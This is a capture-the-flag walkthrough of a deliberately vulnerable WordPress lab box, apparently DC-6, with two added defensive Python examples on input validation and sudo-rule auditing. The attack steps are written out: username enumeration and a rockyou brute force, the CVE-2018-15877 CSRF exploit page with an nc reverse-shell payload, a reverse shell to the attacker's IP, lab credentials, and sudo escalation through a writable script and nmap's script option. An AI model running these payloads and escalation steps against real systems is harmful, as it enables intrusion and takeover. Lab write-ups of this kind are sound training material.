Identify the target: 192.168.0.141
Port 80 is open, take a look
nmap -sP 192.168.0.0/24
nmap -sV 192.168.0.141
Can't view it directly
Add an entry with vim /etc/hosts
Now it's reachable; it's WordPress, so bring in wpscan
Found five usernames; write the five usernames into a txt file to use as a username wordlist
Kali ships with a wordlist, rockyou.txt
wpscan --url http://wordy -eu
Not time-consuming at all, only an hour, thrilling
Looked up the admin backend online: wp-admin
Couldn't wait any longer, just looked up the answer online
Account: mark
Password: helpdesk01
wpscan --url http://wordy -U /Desktop/user.txt -P /usr/share/wordlists/rockyou.txt
<!--
About:
===========
Component: Plainview Activity Monitor (Wordpress plugin)
Vulnerable version: 20161228 and possibly prior
Fixed version: 20180826
CVE-ID: CVE-2018-15877
CWE-ID: CWE-78
Author:
- Lydéric Lefebvre (https://www.linkedin.com/in/lydericlefebvre)
Timeline:
===========
- 2018/08/25: Vulnerability found
- 2018/08/25: CVE-ID request
- 2018/08/26: Reported to developer
- 2018/08/26: Fixed version
- 2018/08/26: Advisory published on GitHub
- 2018/08/26: Advisory sent to bugtraq mailing list
Description:
===========
Plainview Activity Monitor Wordpress plugin is vulnerable to OS
command injection which allows an attacker to remotely execute
commands on the underlying system. The application passes unsafe user-supplied
data from the ip parameter into activities_overview.php.
Privileges are required in order to exploit this vulnerability, but
this plugin version is also vulnerable to CSRF attack and Reflected
XSS. Combined, these three vulnerabilities can lead to Remote Command
Execution just with an admin click on a malicious link.
References:
===========
https://github.com/aas-n/CVE/blob/master/CVE-2018-15877/
PoC:
-->
<html>
<!-- Wordpress Plainview Activity Monitor RCE
[+] Version: 20161228 and possibly prior
[+] Description: Combine OS Commanding and CSRF to get reverse shell
[+] Author: Lydéric LEFEBVRE
[+] CVE-ID: CVE-2018-15877
[+] Usage: Replace 127.0.0.1 & 9999 with your ip and port to get reverse shell
[+] Note: Many reflected XSS exist on this plugin and can be combined with this exploit as well
-->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:8000/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data">
<input type="hidden" name="ip" value="google.fr| nc -nlvp 127.0.0.1 9999 -e /bin/bash" />
<input type="hidden" name="lookup" value="Lookup" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
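The advisory above boils down to two defects: the `ip` value is concatenated into a shell command, and the form that submits it carries no anti-CSRF token. The following is an added example, not the plugin's code or the advisory author's, showing how a lookup handler closes both holes: it accepts only a literal IP address or a syntactically valid hostname, passes the value to the lookup tool as a separate argv element (so `|`, `;` and `$(...)` are never seen by a shell), and compares a per-form nonce in constant time. The `dig +short` argv, the regex and the function names are assumptions chosen for this example.

```python
import hmac
import ipaddress
import re
import subprocess

# Constructed example: a safe "lookup this IP/hostname" handler.
# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens,
# no label starting or ending with '-', at most 253 characters in total.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*\.?$"
)


def is_valid_lookup_target(value: str) -> bool:
    """True only for a literal IPv4/IPv6 address or a well-formed hostname.
    Shell metacharacters, whitespace and a leading '-' or '+' (option
    injection into the lookup tool) all fail this check."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    return bool(_HOSTNAME_RE.match(value))


def build_lookup_argv(target: str) -> list:
    """Return the argv list for the lookup (assumed tool: dig +short).
    A list is handed to the OS directly; no shell ever parses `target`."""
    if not is_valid_lookup_target(target):
        raise ValueError("invalid lookup target: %r" % target)
    return ["dig", "+short", target]


def run_lookup(target: str, timeout: float = 5.0) -> str:
    """Execute the lookup without shell=True and return its stdout."""
    argv = build_lookup_argv(target)
    result = subprocess.run(argv, capture_output=True, text=True,
                            timeout=timeout, check=False)
    return result.stdout


def nonce_is_valid(submitted: str, expected: str) -> bool:
    """Constant-time check of the per-form token that must accompany the
    POST; a request forged from another origin cannot know `expected`."""
    return hmac.compare_digest(submitted.encode(), expected.encode())


if __name__ == "__main__":
    # The payload shape from the PoC above is rejected before any command is built.
    for candidate in ["google.fr", "8.8.8.8", "::1", "google.fr| id", "-x.example"]:
        print("%-15r valid=%s" % (candidate, is_valid_lookup_target(candidate)))
```

Validation plus argv-style execution is the pair that matters: validation alone still breaks if a later refactor reintroduces string concatenation, and argv-style execution alone would still let a value such as `-f/etc/passwd` reach the tool as an option.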
Saw the plugin, look for a vulnerability
Remote command execution vulnerability
An exploit is already provided
Enter a domain name and capture the request with Burp
Append |id after the domain name
There is output
Go straight to nc
nc -e /bin/sh 192.168.0.128 4444
python -c 'import pty;pty.spawn("/bin/bash")'
Looked through the files, which gave:
Account: graham
Password: GSo7isUM1D4
SSH in with the account just found
ssh graham@192.168.0.141
jens has no password
Saw backups.sh
It's a packaging script
sudo -l
Write /bin/bash into the file
Run it
echo "/bin/bash" >> backups.sh
sudo -u jens ./backups.sh
Keep checking what can be executed
Privilege escalation via nmap
sudo -l
echo 'os.execute("/bin/sh")' > getshell
sudo nmap --script=getshell
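Both escalation steps above come from the same misconfiguration class: a sudo rule whose target is either a script the invoking user can write to (backups.sh) or a binary that will run arbitrary code when asked (nmap with --script). As an added example, not part of the original write-up, here is a small auditor that parses `sudo -l` style output and flags both patterns. The sample output is constructed for this example in the shape `sudo -l` prints, the host name `dc-6` and the rule set are assumptions, and the list of code-running binaries is a starting point rather than a complete inventory.

```python
import os
import re

# Constructed `sudo -l` output (not captured from any box): a
# "User X may run..." header followed by indented rules.
SAMPLE_SUDO_L = """\
User graham may run the following commands on dc-6:
    (jens) NOPASSWD: /home/jens/backups.sh
User jens may run the following commands on dc-6:
    (root) NOPASSWD: /usr/bin/nmap
    (root) /usr/bin/apt-get
"""

# Binaries that execute caller-supplied code when given a script, an
# interpreter argument or a shell escape (assumed, non-exhaustive list).
CODE_RUNNERS = {
    "nmap", "python", "python2", "python3", "perl", "ruby", "lua",
    "vim", "vi", "less", "more", "find", "awk", "bash", "sh",
}

_HEADER_RE = re.compile(r"^User (\S+) may run the following commands")
_RULE_RE = re.compile(r"^\s+\(([^)]+)\)\s+(?:(NOPASSWD|PASSWD):\s+)?(.+)$")


def parse_sudo_l(text):
    """Return (invoking_user, runas, nopasswd, command) tuples.
    runas keeps sudo's own spelling, e.g. 'root' or 'root : root'."""
    rules = []
    user = None
    for line in text.splitlines():
        m = _HEADER_RE.match(line)
        if m:
            user = m.group(1)
            continue
        m = _RULE_RE.match(line)
        if m and user:
            runas, tag, cmd = m.groups()
            rules.append((user, runas.strip(), tag == "NOPASSWD", cmd.strip()))
    return rules


def audit_sudo_rules(text, writable=None):
    """Flag rules whose target is writable by the invoking user, is a
    code-running binary, or is ALL.  The default `writable` predicate asks
    the OS about the *current* process, so run this as the user being
    audited; pass a predicate to supply ownership facts from elsewhere."""
    if writable is None:
        writable = lambda path: os.access(path, os.W_OK)
    findings = []
    for user, runas, nopasswd, cmd in parse_sudo_l(text):
        if cmd == "ALL":
            findings.append((user, runas, cmd, "unrestricted sudo"))
            continue
        path = cmd.split()[0]
        name = os.path.basename(path)
        if writable(path):
            findings.append((user, runas, path, "target writable by invoking user"))
        if name in CODE_RUNNERS:
            findings.append((user, runas, path, "binary can run arbitrary code"))
    return findings


if __name__ == "__main__":
    # Pretend only backups.sh is writable, as on the box described above.
    for finding in audit_sudo_rules(SAMPLE_SUDO_L,
                                    writable=lambda p: p.endswith("backups.sh")):
        print("%s -> (%s) %s: %s" % finding)
```

The fix for each finding is the same as the vulnerability it mirrors: make the sudo target a root-owned, non-writable script (or a path under /usr/local/sbin), and never grant sudo on an interpreter or on a tool with a script option unless its arguments are pinned in the rule.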
cd /root
cat theflag.txt
Got the flag!!!!
A whole week without working through a single box, I don't even know what I was doing. I thought I'd forgotten everything I learned before, but thankfully I hadn't; I actually feel more fluent than before, and can finish a box in half a day. Keep going!